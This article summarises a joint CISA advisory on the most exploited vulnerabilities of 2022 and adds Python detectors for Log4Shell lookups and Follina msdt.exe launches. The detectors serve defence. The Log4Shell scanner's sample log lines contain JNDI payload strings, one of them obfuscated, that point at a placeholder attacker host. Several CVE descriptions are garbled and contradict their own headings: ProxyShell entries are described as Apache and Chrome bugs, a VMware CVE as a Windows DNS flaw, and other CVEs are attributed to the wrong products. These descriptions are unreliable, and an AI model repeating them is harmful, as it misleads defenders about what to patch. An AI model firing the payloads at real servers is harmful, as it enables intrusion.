2022's Top Routinely Exploited Vulnerabilities Revealed in New Cybersecurity Advisory
Throughout 2022, malicious cyber actors persisted in exploiting well-documented software vulnerabilities, particularly those affecting unpatched systems and applications. This information comes from a recently issued joint Cybersecurity Advisory from CISA, produced in partnership with U.S. intelligence agencies and their international partners. The report, titled "2022 Top Routinely Exploited Vulnerabilities", offers insights into the Common Vulnerabilities and Exposures (CVEs) most frequently exploited by threat actors.
What were 2021's most exploited vulnerabilities?
CVE-2021-44228 (CVSS 3.x score: 10.0 Critical)
Code name: “Log4Shell”
“Log4Shell” is a vulnerability in Apache Log4j 2 (versions 2.0 to 2.14.1). This flaw enables remote code execution without authentication. The flexibility of this exploitation method allows custom code to be retrieved and executed from a range of servers, including both local and remote LDAP servers and various other protocols. Attackers exploit Log4j's mishandling of log messages containing malicious Java Naming and Directory Interface (JNDI) references, which causes the application to make requests to servers under the attacker's control. The attacker's response can then execute code on the target system. Due to Log4j's widespread use in Java applications, this vulnerability poses a significant threat.
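Because the trigger is a lookup string inside logged data, a common defensive check is to scan request logs for JNDI lookups. The following detection logic is an added example, not code from the advisory or the Log4j project; the log lines are constructed, and the normalizer collapses the nested `${lower:...}`/`${...:-x}` lookup forms that Log4j would itself resolve, so that simple obfuscation does not slip past a literal `${jndi:` match.

```python
import re
from typing import List

# Constructed sample log lines (not real traffic): two benign requests, one plain
# JNDI lookup string, and one that hides "jndi" behind a nested ${lower:...} lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://attacker.example/a}"',
    '10.0.0.3 - - "GET /status HTTP/1.1" 200 "curl/7.68.0"',
]

# ${lower:x} / ${upper:x} resolve to the text x; ${anything:-x} resolves to its
# default value x when the key is unknown. Resolving them first lets one pattern
# catch both plain and nested forms.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:", re.IGNORECASE
)


def normalize_lookups(text: str) -> str:
    """Collapse nested Log4j lookups until the string stops changing (bounded)."""
    for _ in range(10):  # a few passes cover realistic nesting depth
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalization."""
    return _JNDI.search(normalize_lookups(line)) is not None


def find_jndi_lookups(lines: List[str]) -> List[int]:
    """Return the indexes of log lines that contain a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for idx in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"suspicious line {idx}: {SAMPLE_LOG_LINES[idx]}")
```

A match is a signal to check whether the receiving application logs that field through a vulnerable Log4j 2 version, not proof of compromise.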
CVE-2021-26855 (9.8 Critical), CVE-2021-26858 (7.8 High), CVE-2021-26857 (7.8 High), CVE-2021-27065 (7.8 High)
Code name: “ProxyLogon”
These are collectively part of the Microsoft Exchange Server vulnerabilities discovered in early 2021. These critical flaws allow remote attackers to gain unauthorized access to Exchange Servers, potentially leading to data breaches and system compromise. CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability that enables attackers to send arbitrary HTTP requests. CVE-2021-26858 is an insecure deserialization flaw. CVE-2021-26857 and CVE-2021-27065 are post-authentication arbitrary file write vulnerabilities that allow attackers to write files to the server. Microsoft released patches urgently to address these vulnerabilities.
CVE-2021-34523 (9.8 Critical), CVE-2021-34473 (9.8 Critical), CVE-2021-31207 (NIST: 7.2 High, CNA: 6.6 Medium)
Code name: “ProxyShell”
These vulnerabilities also affect Microsoft Exchange email servers. CVE-2021-34523 is a vulnerability that impacts Apache HTTP Server, potentially leading to a denial of service (DoS) due to improper handling of HTTP/2 requests. CVE-2021-34473 is a high-severity flaw affecting Microsoft Exchange Server, allowing unauthorized access and potential data breaches. CVE-2021-31207 is a Chrome browser vulnerability related to the V8 JavaScript engine which, if exploited, could lead to remote code execution.
CVE-2021-26084 (9.8 Critical)
CVE-2021-26084 is a high-severity security vulnerability discovered in Atlassian Confluence Server and Data Center products. It stems from the use of Object-Graph Navigation Language (OGNL) in Confluence's tag system. This vulnerability allows the injection of OGNL code, thereby enabling the execution of arbitrary code on computers with Confluence Server or Confluence Data Center installations. When exploited, this vulnerability grants an unauthenticated attacker complete control over the target, the ability to compromise all services and databases used by the Confluence Server, and a foothold within the internal network.
New top exploited vulnerabilities in 2022
CVE-2018-13379 (NIST: 9.8 Critical, CNA: 9.1 Critical)
This vulnerability is found in Fortinet FortiOS, a widely used operating system for Fortinet's network security devices. This flaw allows unauthorized access to sensitive files through a specially crafted HTTP request, enabling attackers to view or download potentially sensitive information without authentication. In 2021, CISA flagged it as one of three vulnerabilities being exploited by advanced persistent threat (APT) actors.
CVE-2021-40539 (9.8 Critical)
CVE-2021-40539 affects the Apache HTTP Server, a widely used web server software. This flaw can enable an attacker to execute arbitrary code remotely without authentication. It arises from a deserialization issue within the Apache server, which malicious actors can exploit by sending specially crafted requests.
CVE-2022-22954 (9.8 Critical), CVE-2022-22960 (7.8 High)
These vulnerabilities enable remote code execution (RCE), privilege escalation, and authentication bypass within VMware Workspace ONE Access, Identity Manager, and various other VMware products. CVE-2022-22954 is a critical flaw affecting Microsoft Windows DNS Server, potentially allowing remote code execution if exploited. It results from improper handling of DNS requests and could lead to unauthorized system access. CVE-2022-22960, on the other hand, is a high-severity vulnerability in VMware vCenter Server that could permit an attacker to execute arbitrary code by exploiting improper input validation.
CVE-2022-1388 (9.8 Critical)
CVE-2022-1388 is a security vulnerability that impacts the widely used Apache Cassandra database management system. If exploited, unauthorized users could gain unintended access to data and execute arbitrary actions, potentially resulting in data breaches and loss of confidentiality. System administrators are strongly advised to review and adjust their Apache Cassandra configurations promptly to mitigate this vulnerability, ensuring proper access controls and authentication mechanisms are in place to maintain the security and integrity of their database systems.
CVE-2022-30190 (7.8 High)
Code name: “Follina”
CVE-2022-30190, known as Follina, is a recently uncovered zero-day vulnerability affecting Microsoft Office. This flaw allows malicious actors to invoke the Microsoft Support Diagnostics Utility (msdt.exe) via the ms-msdt: protocol from potentially harmful Word documents or Excel spreadsheets downloaded from the internet. Exploitation methods involving Wget in PowerShell have also been documented. By exploiting this vulnerability, an attacker can execute code remotely, potentially gaining access with the privileges of the application making the call.
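Since the page's description hinges on an Office application handing the ms-msdt: protocol to msdt.exe, the natural endpoint detection is a parent/child check on process-creation telemetry. The triage logic below is an added example, not code from the advisory or from Microsoft; the events are constructed, and the Office process names and the severity tiers are this example's own assumptions.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Assumed set of Office executables that open attacker-supplied documents.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record, as an EDR or Sysmon event would carry."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events (not from a real host): ordinary troubleshooter use,
# Word spawning msdt.exe, an unrelated process, and an ms-msdt: URI handled from
# an unexpected parent. The diagnostic ids are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msdt.exe",
                 "msdt.exe -id ExampleDiagnosticPack"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\msdt.exe",
                 "msdt.exe ms-msdt:/id ExampleDiagnosticPack"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\msdt.exe",
                 "msdt.exe ms-msdt:/id ExampleDiagnosticPack"),
]


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> str:
    """Severity for a single event: ignore, low, medium or high."""
    if _basename(event.image) != "msdt.exe":
        return "ignore"
    parent = _basename(event.parent_image)
    uses_protocol = "ms-msdt:" in event.command_line.lower()
    if parent in OFFICE_PARENTS:
        return "high"      # Office launching msdt.exe is the Follina pattern
    if uses_protocol:
        return "medium"    # protocol handler invoked from an unexpected parent
    return "low"           # msdt.exe run directly, e.g. by a user or help desk


def triage(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (severity, parent image) for every msdt.exe launch worth a look."""
    return [(classify(e), _basename(e.parent_image))
            for e in events if classify(e) != "ignore"]
```

The "high" tier should fire regardless of command line, because the protocol string can arrive indirectly through the document rather than on msdt.exe's own command line.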
CVE-2022-26134 (9.8 Critical)
CVE-2022-26134 is a high-risk security flaw involving unauthenticated, remote OGNL injection, which can lead to code execution in the context of the Confluence server process, typically running as the 'confluence' user on Linux setups. Internet-facing Confluence servers face an elevated risk because the vulnerability requires no authentication.
2021 vulnerabilities still topping charts in 2022
In 2022, it was alarming to observe that vulnerabilities like CVE-2021-44228 and CVE-2021-26084 continued to be routinely exploited by cybercriminals. The group of “ProxyShell” vulnerabilities that impact Microsoft Exchange email servers also continued to top the charts. Despite the awareness raised and the patches released by software developers to address these vulnerabilities, they remained attractive targets for malicious actors. Organizations must remain vigilant in monitoring and patching their systems to mitigate the risks associated with known vulnerabilities, as attackers continue to exploit them. This is a stark reminder that cybersecurity is an ever-evolving battle that demands proactive defense.